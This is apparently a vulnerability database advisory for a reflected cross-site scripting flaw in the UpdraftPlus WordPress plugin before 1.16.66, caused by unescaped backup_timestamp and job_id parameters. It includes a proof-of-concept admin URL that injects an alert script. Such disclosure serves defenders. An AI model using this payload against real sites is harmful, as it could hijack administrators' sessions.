WordPress Plugin Vulnerabilities
UpdraftPlus < 1.16.66 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the backup_timestamp and job_id parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues
Proof of Concept
https://example.com/wp-admin/options-general.php?page=updraftplus&backup_timestamp=%3Cscript%3Ealert%28/XSS/%29%3B%3C%2Fscript%3E&action=updraft_restore
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-06 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)